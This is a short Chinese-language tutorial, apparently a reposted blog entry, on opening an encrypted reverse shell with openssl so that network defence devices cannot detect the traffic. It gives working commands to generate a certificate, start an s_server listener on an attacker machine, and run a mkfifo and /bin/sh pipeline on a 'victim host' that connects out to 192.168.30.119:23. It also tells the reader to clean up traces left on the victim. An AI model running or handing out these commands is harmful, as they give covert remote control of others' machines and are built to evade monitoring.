• Reverse-Encrypted-Shell-via-Openssl


    0x01 简介

    使用常规NC或者其他常规的方法反弹shell,由于流量都是明文的,很容易被网络防御设备检测到,因此需要对传输内容进行混淆或者加密。并且几乎每一个https都有openssl库,方便我们使用openssl反弹shell。下面将在linux下进行演示。

    0x02 使用openssl反弹加密shell

    **linux **
    2.1 生成密钥

    openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
    

    自生成密钥会提示输入证书信息,如果懒人就可以一路回车。回在本目录下生成文件 key.pem cert.pem
    启动监听

    openssl s_server -quiet -key key.pem -cert cert.pem -port 23
    

    此时在攻击机23端口上启动了SSL/server服务
    2.2 受害主机上反弹加密shell

    mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.30.119:23 > /tmp/s; rm /tmp/s
    


    tips:
    1.需要注意的是,当攻击机断开连接的时候回在受害主机上提示,需要适当清除。

    2.这是非交互式shell,需要提升为交互式shell,后面会补充。

  • 相关阅读:
    对象拷贝-深拷贝
    eclipse安装桌面快捷方式
    ajax 分页
    单例模式
    过滤器
    ajax参数详解
    json
    反射
    jdbc02
    jdbc --例子7
  • 原文地址:https://www.cnblogs.com/Rightsec/p/11736747.html
Copyright © 2020-2023  润新知